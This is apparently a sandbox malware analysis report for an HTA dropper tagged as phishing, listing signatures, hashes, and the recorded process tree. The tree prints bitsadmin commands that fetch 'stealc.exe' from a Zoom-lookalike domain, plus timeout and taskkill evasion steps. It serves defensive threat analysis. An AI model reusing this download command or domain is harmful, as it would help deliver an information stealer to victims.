Overview

overview

8

Static

static

1

xyz.hta

windows7-x64

8

xyz.hta

windows10-2004-x64

8

xyz.hta

windows10-ltsc 2021-x64

8

xyz.hta

windows11-21h2-x64

8

Analysis

  • max time kernel
    1379s
  • max time network
    1218s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    09-11-2024 00:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    xyz.hta

  • Size

    74KB

  • MD5

    acfba6ff2e80e0ebc80df9e7d326337c

  • SHA1

    fe28d5756815fdac31a744a2f11c075f5b1892bc

  • SHA256

    92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138

  • SHA512

    2dcea669b4b3135bca6eba88542948188e25fb040db0a83bac03957b1fd59037998e7bb4a38774115ca051f07cbeacf99fd95113321e6c8fae4568a2e4e30f00

  • SSDEEP

    768:BfaGWSO85ALmEcHUfkJ7Bate4LV1VZ6Y3PaNNHpXKMcpgUj:gGZALNcH77BajLbf61NR1pcbj

Score
8/10
googlediscoverydropperphishing

Malware Config

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Download via BitsAdmin 1 TTPs 4 IoCs
    dropper
  • Detected potential entity reuse from brand GOOGLE.
    phishinggoogle
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 4 IoCs
    evasion
  • Kills process with taskkill 4 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\xyz.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 30 /nobreak
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2760
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /F /PID
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        PID:940
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:2788
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:2840
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0xc4
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2152
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1156
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\xyz.hta"
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:108
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 30 /nobreak
          3⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:2416
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /PID
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:928
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
        2⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:1584
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xyz.vbs"
      1⤵
        PID:1484
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\xyz.hta"
        1⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Windows\SysWOW64\bitsadmin.exe
          "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
          2⤵
          • Download via BitsAdmin
          • System Location Discovery: System Language Discovery
          PID:2084
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2056
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 30 /nobreak
            3⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:1992
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /PID
            3⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            PID:1100
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x498
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1952
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\xyz.hta"
        1⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2152
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 30 /nobreak
            3⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:1172
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /PID
            3⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            PID:2488
        • C:\Windows\SysWOW64\bitsadmin.exe
          "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
          2⤵
          • Download via BitsAdmin
          • System Location Discovery: System Language Discovery
          PID:1672

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199
        Filesize

        854B

        MD5

        e935bc5762068caf3e24a2683b1b8a88

        SHA1

        82b70eb774c0756837fe8d7acbfeec05ecbf5463

        SHA256

        a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

        SHA512

        bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
        Filesize

        1KB

        MD5

        04aa1b25f53682aa1f27b48d0115d3c5

        SHA1

        20f5ab3031f8d17a834977341eb8d62576286625

        SHA256

        0630fe3c74cf55473780bdcb0faa1f8c3c1be86375341d2fd143ee8722dcd663

        SHA512

        7e1da3066e73145782a00fd77f3b6be1c494c7f866785995065348bd6a0cf6e263e2335b723158eeb1edfef3658ab1c980f7a6dd5830055fc37d4a1f72616c2c

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7
        Filesize

        472B

        MD5

        2268d17aa64cee418bc4659167c367ef

        SHA1

        42493d1b9f13b2a21fddb5d238ac2ca4b0fa6c5d

        SHA256

        d5ee56d6bc6d33a989917fdf25e637540c988037d55970b7261fa4f5b0252081

        SHA512

        9608c7d2af9f1cfdc577cc644b3f5d1af178415148f956b1c825316d2eb4140180d5535aa79864584f878e8c2b1e31f2325ebad6e6efa2b310eac4c7544e040f

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
        Filesize

        1KB

        MD5

        a266bb7dcc38a562631361bbf61dd11b

        SHA1

        3b1efd3a66ea28b16697394703a72ca340a05bd5

        SHA256

        df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

        SHA512

        0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
        Filesize

        170B

        MD5

        8e638f905b22c941e43941d54e56ef42

        SHA1

        2799ec6b6ead279e165f718c236e0649d2ed96df

        SHA256

        d4394040a676ed7791359efd53b5ff72e74f26d96037f2647711e19eab8af930

        SHA512

        3b7caeed3b7c0f0db94065a160d090407fd9ca8b0f07c4d01854325a6a63a02d20a655c75aa499d144d15d60f76f84d6af253087e08a33fc051dbd6e8c8c8b79

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
        Filesize

        410B

        MD5

        95f03d54f3259a681869929295aae4cc

        SHA1

        e9c465f1ba7597f1a4db00fc96eb1911dfb10896

        SHA256

        0f9c33bab4e9c75bc27c5fc02c5430f985074498e5d6bce83a4c4d65aae5e218

        SHA512

        31c8e774c7d5b22df22f5845ffae0a18cfec5381f8a41bb6cd2022ef92fc800f1f9d0ffa16726a1eced781d425edc7a17fb021b38bd94ee1f24c14b8e2b72fea

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        a965169d2b906b67f0d0297ca17cd0db

        SHA1

        9fdd69dde7399cbacc73988fa88ddba1752c622b

        SHA256

        bf2c009c9e186e7a509ec0d721ccfe89e025138799841db85a8438714a22b2bc

        SHA512

        865163ee76dc66afe63ee82d028dd993933c63576c2da167f914247897c0e71d7a4e5e3bd4b1ac02de05a89ec0edd0f59ce1acf848546c16a2dc5c6ea9977333

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7
        Filesize

        398B

        MD5

        14e9364b51f92e4ed4ea6e131e79d44c

        SHA1

        92485cdef664f6ca7fd40dbbc377dc3fe4f698d5

        SHA256

        90b090e36a3910ef39ea699c36b54895458584143d44f219bbd08001edbb60a8

        SHA512

        1e6ac371fc77b04dc9a080bab61a74d8c0186c9d598557c9f9956322ee095cce6a5ab3ad9c43f736386ccd13f0b084d4c82a8c6509751067adbed9a5e684097f

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
        Filesize

        242B

        MD5

        d1aba87a975bad9ab490397af6a4503b

        SHA1

        791bb1ba5f7c6522838aa293f51c3e3076d4338f

        SHA256

        38656b43cb92e6a7128d8cb7c5c48e9142af7b6ca3876a65cd655496443db93f

        SHA512

        68de5451bbcdf79a029f7ee104607b83bd51f0fde80d9610b5a7a6bc80c0046342866782e87d0a0263863dd0d1a19386ae756b7dec09f6d85ce51933170a798c

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\favicon[1].ico
        Filesize

        5KB

        MD5

        f3418a443e7d841097c714d69ec4bcb8

        SHA1

        49263695f6b0cdd72f45cf1b775e660fdc36c606

        SHA256

        6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

        SHA512

        82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Cab1297.tmp
        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Tar7F3F.tmp
        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        Download Submit

      • memory/1156-25-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

        Download

      • memory/1156-24-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

        Download

      • memory/1156-23-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

        Download